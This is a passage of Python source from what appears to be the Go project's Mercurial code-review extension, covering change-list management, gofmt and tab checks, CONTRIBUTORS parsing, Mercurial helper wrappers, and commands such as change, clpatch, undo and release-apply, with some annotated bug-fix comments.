    (which create a new CL).  Returns (cl, '') or (None, errormsg).
    """
    if len(pats) > 0 and GoodCLName(pats[0]):
        # Existing CL by number.
        if len(pats) != 1:
            return None, "cannot specify change number and file names"
        if opts.get('message'):
            return None, "cannot use -m with existing CL"
        cl, err = LoadCL(ui, repo, pats[0], web=True)
        if err != "":
            return None, err
    else:
        # New CL built from the changed files matching pats.
        cl = CL("new")
        cl.local = True
        cl.files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
        if not cl.files:
            return None, "no files changed"
    if opts.get('reviewer'):
        cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
    if opts.get('cc'):
        cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
    if defaultcc:
        cl.cc = Add(cl.cc, defaultcc)
    if cl.name == "new":
        # A brand-new CL needs a description: from -m or the editor.
        if opts.get('message'):
            cl.desc = opts.get('message')
        else:
            err = EditCL(ui, repo, cl)
            if err != '':
                return None, err
    return cl, ""
#######################################################################
# Change list file management

# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, taken=None):
    """Sorted changed files matching pats, minus files claimed in taken."""
    if not taken:
        taken = {}
    # Run each pattern separately so that we can warn about
    # patterns that didn't do anything useful.
    for pat in pats:
        for f in hg_matchPattern(ui, repo, pat, unknown=True):
            promptadd(ui, repo, f)
        for f in hg_matchPattern(ui, repo, pat, removed=True):
            promptremove(ui, repo, f)
        matched = hg_matchPattern(ui, repo, pat, modified=True, added=True, removed=True)
        for f in matched:
            if f in taken:
                ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
        if not matched:
            ui.warn("warning: %s did not match any modified files\n" % (pat,))
    # Again, all at once (eliminates duplicates)
    result = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
    result.sort()
    if taken:
        result = Sub(result, taken.keys())
    return result
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
    """Sorted modified/added (hence still present) files matching pats."""
    existing = hg_matchPattern(ui, repo, *pats, modified=True, added=True)
    existing.sort()
    return existing
# Return list of files claimed by existing CLs
def Taken(ui, repo):
    """Map file name -> CL object for every file claimed by a local CL."""
    claimed = {}
    for cl in LoadAllCL(ui, repo, web=False).values():
        for f in cl.files:
            claimed[f] = cl
    return claimed
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats):
    """Changed files matching pats that no existing CL already claims."""
    claimed = Taken(ui, repo)
    return ChangedFiles(ui, repo, pats, taken=claimed)
#######################################################################
# File format checking.

def CheckFormat(ui, repo, files, just_warn=False):
    """Run the gofmt and tab-indentation checks over files."""
    set_status("running gofmt")
    for check in (CheckGofmt, CheckTabfmt):
        check(ui, repo, files, just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
    """Run 'gofmt -l' on the .go files; abort (or warn) if any need formatting."""
    # test/ files are exempt from gofmt, except test/bench/.
    files = [f for f in files if (not f.startswith('test/') or f.startswith('test/bench/')) and f.endswith('.go')]
    if not files:
        return
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    # Skip files that no longer exist (e.g. removed in this CL).
    files = [f for f in files if os.access(f, 0)]
    if not files:
        return
    try:
        cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
        cmd.stdin.close()
    except:
        raise hg_util.Abort("gofmt: " + ExceptionDetail())
    data = cmd.stdout.read()
    errors = cmd.stderr.read()
    cmd.wait()
    set_status("done with gofmt")
    if len(errors) > 0:
        ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
        return
    if len(data) > 0:
        # gofmt -l prints the names of files whose formatting would change.
        msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
        if just_warn:
            ui.warn("warning: " + msg + "\n")
        else:
            raise hg_util.Abort(msg)
    return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
    """Check that C/assembly sources under src/ indent with tabs, not spaces.

    Aborts (or warns, when just_warn is True) with the list of offenders.
    """
    files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f)]
    if not files:
        return
    cwd = os.getcwd()
    files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
    files = [f for f in files if os.access(f, 0)]
    badfiles = []
    for f in files:
        try:
            # BUG FIX: the file handle was never closed, leaking one
            # descriptor per scanned file; close it on every path.
            fh = open(f, 'r')
            try:
                for line in fh:
                    # Four leading spaces is enough to complain about,
                    # except that some Plan 9 code uses four spaces as the label indent,
                    # so allow that.
                    if line.startswith('    ') and not re.match('    [A-Za-z0-9_]+:', line):
                        badfiles.append(f)
                        break
            finally:
                fh.close()
        except:
            # ignore cannot open file, etc.
            pass
    if len(badfiles) > 0:
        msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
        if just_warn:
            ui.warn("warning: " + msg + "\n")
        else:
            raise hg_util.Abort(msg)
    return
#######################################################################
# CONTRIBUTORS file parsing

# Maps lower-cased email (primary and alternates) -> (name, primary email).
contributors = {}

def ReadContributors(ui, repo):
    """Populate the contributors map from the repo's CONTRIBUTORS file.

    Missing or unreadable files produce a warning, not an error.
    """
    global contributors
    try:
        f = open(repo.root + '/CONTRIBUTORS', 'r')
    except:
        ui.write("warning: cannot open %s: %s\n" % (repo.root+'/CONTRIBUTORS', ExceptionDetail()))
        return
    try:
        for line in f:
            # CONTRIBUTORS is a list of lines like:
            #	Person <email>
            #	Person <email> <alt-email>
            # The first email address is the one used in commit logs.
            if line.startswith('#'):
                continue
            m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
            if m:
                name = m.group(1)
                email = m.group(2)[1:-1]
                contributors[email.lower()] = (name, email)
                for extra in m.group(3).split():
                    contributors[extra[1:-1].lower()] = (name, email)
    finally:
        # BUG FIX: the original never closed the file handle.
        f.close()
def CheckContributor(ui, repo, user=None):
    """Return the CONTRIBUTORS line for user, aborting if user is unknown."""
    set_status("checking CONTRIBUTORS file")
    user, userline = FindContributor(ui, repo, user, warn=False)
    if userline:
        return userline
    raise hg_util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
def FindContributor(ui, repo, user=None, warn=True):
    """Resolve user (default: the configured ui.username) against CONTRIBUTORS.

    Returns (email, 'Name <email>') when found, or (user, None) when not.
    """
    if not user:
        user = ui.config("ui", "username")
        if not user:
            raise hg_util.Abort("[ui] username is not configured in .hgrc")
    user = user.lower()
    # Accept "Name <email>" form; keep just the email.
    m = re.match(r".*<(.*)>", user)
    if m:
        user = m.group(1)
    if user not in contributors:
        if warn:
            ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (user,))
        return user, None
    name, email = contributors[user]
    return email, "%s <%s>" % (name, email)
#######################################################################
# Mercurial helper functions.
# Read http://mercurial.selenic.com/wiki/MercurialApi before writing any of these.
# We use the ui.pushbuffer/ui.popbuffer + hg_commands.xxx tricks for all interaction
# with Mercurial.  It has proved the most stable as they make changes.

hgversion = hg_util.version()

# We require Mercurial 1.9 and suggest Mercurial 2.0.
# The details of the scmutil package changed then,
# so allowing earlier versions would require extra band-aids below.
# Ubuntu 11.10 ships with Mercurial 1.9.1 as the default version.
hg_required = "1.9"
hg_suggested = "2.0"

old_message = """
The code review extension requires Mercurial """+hg_required+""" or newer.
You are using Mercurial """+hgversion+""".

To install a new Mercurial, use

	sudo easy_install mercurial=="""+hg_suggested+"""

or visit http://mercurial.selenic.com/downloads/.
"""

linux_message = """
You may need to clear your current Mercurial installation by running:

	sudo apt-get remove mercurial mercurial-common
	sudo rm -rf /etc/mercurial
"""

# Refuse to load at all when running under an unsupported Mercurial.
if hgversion < hg_required:
    msg = old_message
    if os.access("/etc/mercurial", 0):
        msg += linux_message
    raise hg_util.Abort(msg)
from mercurial.hg import clean as hg_clean
from mercurial import cmdutil as hg_cmdutil
from mercurial import error as hg_error
from mercurial import match as hg_match
from mercurial import node as hg_node
class uiwrap(object):
    """Capture ui output.

    Construction pushes a ui buffer and silences ui; output() restores
    the previous quiet/verbose settings and returns the buffered text.
    """
    def __init__(self, ui):
        self.ui = ui
        ui.pushbuffer()
        self.oldQuiet = ui.quiet
        self.oldVerbose = ui.verbose
        ui.quiet = True
        ui.verbose = False
    def output(self):
        ui = self.ui
        ui.quiet = self.oldQuiet
        ui.verbose = self.oldVerbose
        return ui.popbuffer()
def to_slash(path):
    """Normalize Windows backslash separators to forward slashes."""
    if sys.platform != "win32":
        return path
    return path.replace('\\', '/')
def hg_matchPattern(ui, repo, *pats, **opts):
    """Return repo-root-relative paths of files whose 'hg status' matches opts.

    opts selects the status classes (modified=True, unknown=True, ...).
    """
    w = uiwrap(ui)
    hg_commands.status(ui, repo, *pats, **opts)
    text = w.output()
    ret = []
    prefix = to_slash(os.path.realpath(repo.root))+'/'
    for line in text.split('\n'):
        # Status lines look like "M path/to/file".
        f = line.split()
        if len(f) > 1:
            if len(pats) > 0:
                # Given patterns, Mercurial shows relative to cwd
                p = to_slash(os.path.realpath(f[1]))
                if not p.startswith(prefix):
                    print >>sys.stderr, "File %s not in repo root %s.\n" % (p, prefix)
                else:
                    ret.append(p[len(prefix):])
            else:
                # Without patterns, Mercurial shows relative to root (what we want)
                ret.append(to_slash(f[1]))
    return ret
def hg_heads(ui, repo):
    """Return the output of 'hg heads' as a string; abort on error."""
    w = uiwrap(ui)
    err = hg_commands.heads(ui, repo)
    if err:
        raise hg_util.Abort(err)
    return w.output()
# Mercurial output lines that carry no information for the user.
noise = [
    "",
    "resolving manifests",
    "searching for changes",
    "couldn't find merge tool hgmerge",
    "adding changesets",
    "adding manifests",
    "adding file changes",
    "all local heads known remotely",
]

def isNoise(line):
    """Report whether line is one of Mercurial's uninteresting status lines."""
    return str(line) in noise
def hg_incoming(ui, repo):
    """Return 'hg incoming' output; 1 (nothing incoming) is not an error."""
    w = uiwrap(ui)
    status = hg_commands.incoming(ui, repo, force=False, bundle="")
    if status and status != 1:
        raise hg_util.Abort(status)
    return w.output()
def hg_log(ui, repo, **opts):
    """Return the output of 'hg log' as a string; abort on error.

    Mercurial's log command expects the date/keyword/rev/user keys to be
    present in opts, so fill in empty defaults for any the caller omitted.
    """
    for k in ['date', 'keyword', 'rev', 'user']:
        # dict.has_key is deprecated (and removed in Python 3); 'in' is
        # equivalent and works everywhere.
        if k not in opts:
            opts[k] = ""
    w = uiwrap(ui)
    ret = hg_commands.log(ui, repo, **opts)
    if ret:
        raise hg_util.Abort(ret)
    return w.output()
def hg_outgoing(ui, repo, **opts):
    """Return 'hg outgoing' output; 1 (nothing to push) is not an error."""
    w = uiwrap(ui)
    status = hg_commands.outgoing(ui, repo, **opts)
    if status and status != 1:
        raise hg_util.Abort(status)
    return w.output()
def hg_pull(ui, repo, **opts):
    """Run 'hg pull', rewriting its verbose file list into short mv/+/- lines."""
    w = uiwrap(ui)
    ui.quiet = False
    ui.verbose = True  # for file list
    err = hg_commands.pull(ui, repo, **opts)
    for line in w.output().split('\n'):
        if isNoise(line):
            continue
        # Abbreviate Mercurial's verbose per-file messages.
        if line.startswith('moving '):
            line = 'mv ' + line[len('moving '):]
        elif line.startswith('getting ') and line.find(' to ') >= 0:
            line = 'mv ' + line[len('getting '):]
        elif line.startswith('getting '):
            line = '+ ' + line[len('getting '):]
        elif line.startswith('removing '):
            line = '- ' + line[len('removing '):]
        ui.write(line + '\n')
    return err
def hg_push(ui, repo, **opts):
    """Run 'hg push', echoing its output with noise lines filtered out."""
    w = uiwrap(ui)
    ui.quiet = False
    ui.verbose = True
    err = hg_commands.push(ui, repo, **opts)
    for line in w.output().split('\n'):
        if isNoise(line):
            continue
        ui.write(line + '\n')
    return err
def hg_commit(ui, repo, *pats, **opts):
    # Thin pass-through to 'hg commit'.
    return hg_commands.commit(ui, repo, *pats, **opts)
#######################################################################
# Mercurial precommit hook to disable commit except through this interface.

# Set True only while this extension itself is performing a commit.
commit_okay = False

def precommithook(ui, repo, **opts):
    """Precommit hook: allow the commit only when this extension started it."""
    if not commit_okay:
        ui.write("\ncodereview extension enabled; use mail, upload, or submit instead of commit\n\n")
        return True
    return False  # False means okay.
#######################################################################
# @clnumber file pattern support

# We replace scmutil.match with the MatchAt wrapper to add the @clnumber pattern.
match_repo = None   # repo captured for MatchAt
match_ui = None     # ui captured for MatchAt
match_orig = None   # the original scmutil.match

def InstallMatch(ui, repo):
    """Hook scmutil.match, remembering ui/repo and the original function."""
    global match_repo
    global match_ui
    global match_orig
    match_ui = ui
    match_repo = repo
    from mercurial import scmutil
    match_orig = scmutil.match
    scmutil.match = MatchAt
def MatchAt(ctx, pats=None, opts=None, globbed=False, default='relpath'):
    """Replacement for scmutil.match that understands @clnumber patterns.

    Each pattern of the form @NNNNNN (or @default) is expanded into
    'path:' patterns for the files in that CL before delegating to the
    original scmutil.match.
    """
    taken = []      # the @... patterns consumed
    files = []      # files contributed by those patterns
    pats = pats or []
    opts = opts or {}

    for p in pats:
        if p.startswith('@'):
            taken.append(p)
            clname = p[1:]
            if clname == "default":
                # @default: every changed file not claimed by another CL.
                files = DefaultFiles(match_ui, match_repo, [])
            else:
                if not GoodCLName(clname):
                    raise hg_util.Abort("invalid CL name " + clname)
                cl, err = LoadCL(match_repo.ui, match_repo, clname, web=False)
                if err != '':
                    raise hg_util.Abort("loading CL " + clname + ": " + err)
                if not cl.files:
                    raise hg_util.Abort("no files in CL " + clname)
                files = Add(files, cl.files)
    pats = Sub(pats, taken) + ['path:'+f for f in files]

    # work-around for http://selenic.com/hg/rev/785bbc8634f8
    if not hasattr(ctx, 'match'):
        ctx = ctx[None]
    return match_orig(ctx, pats=pats, opts=opts, globbed=globbed, default=default)
#######################################################################
# Commands added by code review extension.

#######################################################################
# hg change

def change(ui, repo, *pats, **opts):
    """create, edit or delete a change list

    Create, edit or delete a change list.
    A change list is a group of files to be reviewed and submitted together,
    plus a textual description of the change.
    Change lists are referred to by simple alphanumeric names.

    Changes must be reviewed before they can be submitted.

    In the absence of options, the change command opens the
    change list for editing in the default editor.

    Deleting a change with the -d or -D flag does not affect
    the contents of the files listed in that change.  To revert
    the files listed in a change, use

    	hg revert @123456

    before running hg change -d 123456.
    """
    if codereview_disabled:
        return codereview_disabled

    # dirty maps CL -> True for CLs whose on-disk state must be rewritten.
    dirty = {}
    if len(pats) > 0 and GoodCLName(pats[0]):
        # Operating on an existing CL by number.
        name = pats[0]
        if len(pats) != 1:
            return "cannot specify CL name and file patterns"
        pats = pats[1:]
        cl, err = LoadCL(ui, repo, name, web=True)
        if err != '':
            return err
        if not cl.local and (opts["stdin"] or not opts["stdout"]):
            return "cannot change non-local CL " + name
    else:
        # Creating a new CL.
        name = "new"
        cl = CL("new")
        if repo[None].branch() != "default":
            return "cannot create CL outside default branch"
        dirty[cl] = True

    files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))

    if opts["delete"] or opts["deletelocal"]:
        # -d deletes the CL everywhere; -D deletes only the local copy.
        if opts["delete"] and opts["deletelocal"]:
            return "cannot use -d and -D together"
        flag = "-d"
        if opts["deletelocal"]:
            flag = "-D"
        if name == "new":
            return "cannot use "+flag+" with file patterns"
        if opts["stdin"] or opts["stdout"]:
            return "cannot use "+flag+" with -i or -o"
        if not cl.local:
            return "cannot change non-local CL " + name
        if opts["delete"]:
            if cl.copied_from:
                return "original author must delete CL; hg change -D will remove locally"
            # Mark issue as abandoned on the server before deleting locally.
            PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
            EditDesc(cl.name, closed=True, private=cl.private)
        cl.Delete(ui, repo)
        return

    if opts["stdin"]:
        # -i: read replacement CL metadata from standard input.
        s = sys.stdin.read()
        clx, line, err = ParseCL(s, name)
        if err != '':
            return "error parsing change list: line %d: %s" % (line, err)
        if clx.desc is not None:
            cl.desc = clx.desc;
            dirty[cl] = True
        if clx.reviewer is not None:
            cl.reviewer = clx.reviewer
            dirty[cl] = True
        if clx.cc is not None:
            cl.cc = clx.cc
            dirty[cl] = True
        if clx.files is not None:
            cl.files = clx.files
            dirty[cl] = True
        if clx.private != cl.private:
            cl.private = clx.private
            dirty[cl] = True

    if not opts["stdin"] and not opts["stdout"]:
        # Interactive path: open the CL in the editor.
        if name == "new":
            cl.files = files
        err = EditCL(ui, repo, cl)
        if err != "":
            return err
        dirty[cl] = True

    # Write back every CL we modified; new CLs are also uploaded so
    # they get a real issue number.
    for d, _ in dirty.items():
        name = d.name
        d.Flush(ui, repo)
        if name == "new":
            d.Upload(ui, repo, quiet=True)

    if opts["stdout"]:
        ui.write(cl.EditorText())
    elif opts["pending"]:
        ui.write(cl.PendingText())
    elif name == "new":
        if ui.quiet:
            ui.write(cl.name)
        else:
            ui.write("CL created: " + cl.url + "\n")
    return
#######################################################################
# hg code-login (broken?)

def code_login(ui, repo, **opts):
    """log in to code review server

    Logs in to the code review server, saving a cookie in
    a file in your home directory.
    """
    if codereview_disabled:
        return codereview_disabled

    # A None request forces an authenticated round trip, which
    # creates/refreshes the login cookie.
    MySend(None)
#######################################################################
# hg clpatch / undo / release-apply / download
# All concerned with applying or unapplying patches to the repository.

def clpatch(ui, repo, clname, **opts):
    """import a patch from the code review server

    Imports a patch from the code review server into the local client.
    If the local client has already modified any of the files that the
    patch modifies, this command will refuse to apply the patch.

    Submitting an imported patch will keep the original author's
    name as the Author: line but add your own name to a Committer: line.
    """
    branch = repo[None].branch()
    if branch != "default":
        return "cannot run hg clpatch outside default branch"
    return clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
def undo(ui, repo, clname, **opts):
    """undo the effect of a CL

    Creates a new CL that undoes an earlier CL.
    After creating the CL, opens the CL text for editing so that
    you can add the reason for the undo to the description.
    """
    branch = repo[None].branch()
    if branch != "default":
        return "cannot run hg undo outside default branch"
    return clpatch_or_undo(ui, repo, clname, opts, mode="undo")
def release_apply(ui, repo, clname, **opts):
    """apply a CL to the release branch

    Creates a new CL copying a previously committed change
    from the main branch to the release branch.
    The current client must either be clean or already be in
    the release branch.

    The release branch must be created by starting with a
    clean client, disabling the code review plugin, and running:

    	hg update weekly.YYYY-MM-DD
    	hg branch release-branch.rNN
    	hg commit -m 'create release-branch.rNN'
    	hg push --new-branch

    Then re-enable the code review plugin.

    People can test the release branch by running

    	hg update release-branch.rNN

    in a clean client.  To return to the normal tree,

    	hg update default

    Move changes since the weekly into the release branch
    using hg release-apply followed by the usual code review
    process and hg submit.

    When it comes time to tag the release, record the
    final long-form tag of the release-branch.rNN
    in the *default* branch's .hgtags file.  That is, run

    	hg update default

    and then edit .hgtags as you would for a weekly.
    """
    c = repo[None]
    if not releaseBranch:
        return "no active release branches"
    if c.branch() != releaseBranch:
        # Need a clean client to switch into the release branch.
        if c.modified() or c.added() or c.removed():
            raise hg_util.Abort("uncommitted local changes - cannot switch branches")
        err = hg_clean(repo, releaseBranch)
        if err:
            return err
    try:
        err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
        if err:
            raise hg_util.Abort(err)
    except Exception, e:
        # On any failure, switch back to the default branch before re-raising.
        hg_clean(repo, "default")
        raise e
    return None
def rev2clname(rev):
    """Extract the CL number from a revision description, or ''.

    The last codereview URL line in the description is the real one;
    earlier ones may be part of the user-written text.
    """
    matches = re.findall('(?m)^http://codereview.appspot.com/([0-9]+)$', rev.description())
    if matches:
        return matches[-1]
    return ""
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
    """Shared implementation of clpatch, undo, and release-apply (backport).

    Builds the patch (downloaded for clpatch, reverse/forward diff for
    undo/backport), ports its line numbers to the current client if
    needed, applies it via hgpatch, and creates/updates the local CL.
    Returns an error string, or None/'' on success.
    """
    if codereview_disabled:
        return codereview_disabled

    if mode == "undo" or mode == "backport":
        # Find revision in Mercurial repository.
        # Assume CL number is 7+ decimal digits.
        # Otherwise is either change log sequence number (fewer decimal digits),
        # hexadecimal hash, or tag name.
        # Mercurial will fall over long before the change log
        # sequence numbers get to be 7 digits long.
        if re.match('^[0-9]{7,}$', clname):
            # BUG FIX: 'found' was previously unset when the loop matched
            # nothing, making 'if not found' raise NameError instead of
            # reporting the missing CL.
            found = False
            for r in hg_log(ui, repo, keyword="codereview.appspot.com/"+clname, limit=100, template="{node}\n").split():
                rev = repo[r]
                # Last line with a code review URL is the actual review URL.
                # Earlier ones might be part of the CL description.
                n = rev2clname(rev)
                if n == clname:
                    found = True
                    break
            if not found:
                return "cannot find CL %s in local repository" % clname
        else:
            rev = repo[clname]
            if not rev:
                return "unknown revision %s" % clname
            clname = rev2clname(rev)
            if clname == "":
                return "cannot find CL name in revision description"

        # Create fresh CL and start with patch that would reverse the change.
        vers = hg_node.short(rev.node())
        cl = CL("new")
        desc = str(rev.description())
        if mode == "undo":
            cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
        else:
            # Consistency fix: use backportFooter here (it has the same
            # text as undoFooter, so behavior is unchanged).
            cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + backportFooter
        v1 = vers
        v0 = hg_node.short(rev.parents()[0].node())
        if mode == "undo":
            arg = v1 + ":" + v0
        else:
            vers = v0
            arg = v0 + ":" + v1
        patch = RunShell(["hg", "diff", "--git", "-r", arg])

    else:  # clpatch
        cl, vers, patch, err = DownloadCL(ui, repo, clname)
        if err != "":
            return err
        if patch == emptydiff:
            return "codereview issue %s has no diff" % clname

    # find current hg version (hg identify)
    ctx = repo[None]
    parents = ctx.parents()
    id = '+'.join([hg_node.short(p.node()) for p in parents])

    # if version does not match the patch version,
    # try to update the patch line numbers.
    if vers != "" and id != vers:
        # "vers in repo" gives the wrong answer
        # on some versions of Mercurial.  Instead, do the actual
        # lookup and catch the exception.
        try:
            repo[vers].description()
        except:
            return "local repository is out of date; sync to get %s" % (vers)
        patch1, err = portPatch(repo, patch, vers, id)
        if err != "":
            if not opts["ignore_hgpatch_failure"]:
                return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
        else:
            patch = patch1

    # Apply the patch with the external hgpatch tool.
    argv = ["hgpatch"]
    if opts["no_incoming"] or mode == "backport":
        argv += ["--checksync=false"]
    try:
        cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
    except:
        return "hgpatch: " + ExceptionDetail()

    out, err = cmd.communicate(patch)
    if cmd.returncode != 0 and not opts["ignore_hgpatch_failure"]:
        return "hgpatch failed"
    cl.local = True
    cl.files = out.strip().split()
    if not cl.files and not opts["ignore_hgpatch_failure"]:
        return "codereview issue %s has no changed files" % clname
    files = ChangedFiles(ui, repo, [])
    extra = Sub(cl.files, files)
    if extra:
        ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
    cl.Flush(ui, repo)
    if mode == "undo":
        # Ask the user to fill in the reason for the undo.
        err = EditCL(ui, repo, cl)
        if err != "":
            return "CL created, but error editing: " + err
        cl.Flush(ui, repo)
    else:
        ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
    """Shift the patch's hunk offsets so it applies against newver.

    Returns (newpatch, '') on success, or (None/'', errormsg) on failure.
    """
    lines = patch.splitlines(True)  # True = keep \n
    delta = None
    for i, line in enumerate(lines):
        if line.startswith('--- a/'):
            # Entering a new file's section: compute its line deltas.
            file = line[6:-1]
            delta = fileDeltas(repo, file, oldver, newver)
            continue
        if not delta or not line.startswith('@@ '):
            continue
        # @@ -x,y +z,w @@ means the patch chunk replaces
        # the original file's line numbers x up to x+y with the
        # line numbers z up to z+w in the new file.
        # Find the delta from x in the original to the same
        # line in the current version and add that delta to both
        # x and z.
        m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
        if not m:
            return None, "error parsing patch line numbers"
        n1, len1, n2, len2 = [int(g) for g in m.groups()]
        d, err = lineDelta(delta, n1, len1)
        if err != "":
            return "", err
        lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1 + d, len1, n2 + d, len2)
    return ''.join(lines), ""
# fileDeltas returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples saying that
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
	# Diff just this file between the two revisions and harvest the
	# hunk headers; the body of each hunk is irrelevant here.
	diff = RunShell(["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file], silent_ok=True)
	hunk = re.compile('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@')
	deltas = []
	for text in diff.splitlines():
		match = hunk.match(text)
		if match is None:
			continue
		a1, a2, b1, b2 = [int(match.group(g)) for g in range(1, 5)]
		# Lines after the changed range move by (new end) - (old end).
		deltas.append((a1, a2, b1 + b2 - (a1 + a2)))
	return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
	# deltas is the fileDeltas result: (old, oldlen, newdelta) triples,
	# in ascending order of old, meaning lines [old, old+oldlen) were
	# modified and lines after that range moved by newdelta.
	# Returns (delta, "") for the last change entirely before n, or
	# (0, errmsg) when [n, n+len) overlaps a modified range.
	d = 0
	for (old, oldlen, newdelta) in deltas:
		if old >= n+len:
			# Change begins after our range; the delta seen so far applies.
			break
		if old+oldlen > n:
			# BUG FIX: was "old+len > n", which tested overlap using the
			# query length instead of the changed range's own length,
			# misreporting conflicts. [old, old+oldlen) overlaps [n, n+len)
			# exactly when old < n+len and old+oldlen > n.
			return 0, "patch and recent changes conflict"
		d = newdelta
	return d, ""
def download(ui, repo, clname, **opts):
	"""download a change from the code review server
	Download prints a description of the given change list
	followed by its diff, downloaded from the code review server.
	"""
	if codereview_disabled:
		return codereview_disabled
	# Fetch CL metadata and the latest patchset diff from Rietveld;
	# vers (the base revision) is unused here.
	cl, vers, patch, err = DownloadCL(ui, repo, clname)
	if err != "":
		return err
	ui.write(cl.EditorText() + "\n")
	ui.write(patch + "\n")
	return
#######################################################################
# hg file
def file(ui, repo, clname, pat, *pats, **opts):
	"""assign files to or remove files from a change list
	Assign files to or (with -d) remove files from a change list.
	The -d option only removes files from the change list.
	It does not edit them or remove them from the repository.
	"""
	if codereview_disabled:
		return codereview_disabled
	pats = tuple([pat] + list(pats))
	if not GoodCLName(clname):
		return "invalid CL name " + clname
	# CLs whose file lists we modify and must write back at the end.
	dirty = {}
	cl, err = LoadCL(ui, repo, clname, web=False)
	if err != '':
		return err
	if not cl.local:
		return "cannot change non-local CL " + clname
	files = ChangedFiles(ui, repo, pats)
	if opts["delete"]:
		# -d: drop the matched files from this CL only.
		oldfiles = Intersect(files, cl.files)
		if oldfiles:
			if not ui.quiet:
				ui.status("# Removing files from CL. To undo:\n")
				ui.status("# cd %s\n" % (repo.root))
				for f in oldfiles:
					ui.status("# hg file %s %s\n" % (cl.name, f))
			cl.files = Sub(cl.files, oldfiles)
			cl.Flush(ui, repo)
		else:
			ui.status("no such files in CL")
		return
	if not files:
		return "no such modified files"
	# Only consider files not already in this CL.
	files = Sub(files, cl.files)
	taken = Taken(ui, repo)
	warned = False
	for f in files:
		if f in taken:
			# File currently belongs to another CL: steal it,
			# printing undo instructions once.
			if not warned and not ui.quiet:
				ui.status("# Taking files from other CLs. To undo:\n")
				ui.status("# cd %s\n" % (repo.root))
				warned = True
			ocl = taken[f]
			if not ui.quiet:
				ui.status("# hg file %s %s\n" % (ocl.name, f))
			if ocl not in dirty:
				ocl.files = Sub(ocl.files, files)
				dirty[ocl] = True
	cl.files = Add(cl.files, files)
	dirty[cl] = True
	# Persist every CL we touched.
	for d, _ in dirty.items():
		d.Flush(ui, repo)
	return
#######################################################################
# hg gofmt
def gofmt(ui, repo, *pats, **opts):
	"""apply gofmt to modified files
	Applies gofmt to the modified files in the repository that match
	the given patterns.
	"""
	if codereview_disabled:
		return codereview_disabled
	files = ChangedExistingFiles(ui, repo, pats, opts)
	# Only Go sources are formatted.
	files = [f for f in files if f.endswith(".go")]
	if not files:
		return "no modified go files"
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	try:
		# -l lists files needing changes; add -w to rewrite in place
		# unless the user asked only for the listing.
		cmd = ["gofmt", "-l"]
		if not opts["list"]:
			cmd += ["-w"]
		if os.spawnvp(os.P_WAIT, "gofmt", cmd + files) != 0:
			raise hg_util.Abort("gofmt did not exit cleanly")
	except hg_error.Abort, e:
		# Let Mercurial aborts (including our own) pass through unchanged.
		raise
	except:
		# Anything else (e.g. gofmt not installed) becomes an Abort.
		raise hg_util.Abort("gofmt: " + ExceptionDetail())
	return
#######################################################################
# hg mail
def mail(ui, repo, *pats, **opts):
	"""mail a change for review
	Uploads a patch to the code review server and then sends mail
	to the reviewer and CC list asking for a review.
	"""
	if codereview_disabled:
		return codereview_disabled
	cl, err = CommandLineCL(ui, repo, pats, opts, defaultcc=defaultcc)
	if err != "":
		return err
	cl.Upload(ui, repo, gofmt_just_warn=True)
	if not cl.reviewer:
		# If no reviewer is listed, assign the review to defaultcc.
		# This makes sure that it appears in the
		# codereview.appspot.com/user/defaultcc
		# page, so that it doesn't get dropped on the floor.
		if not defaultcc:
			return "no reviewers listed in CL"
		# Avoid listing the same addresses as both reviewer and CC.
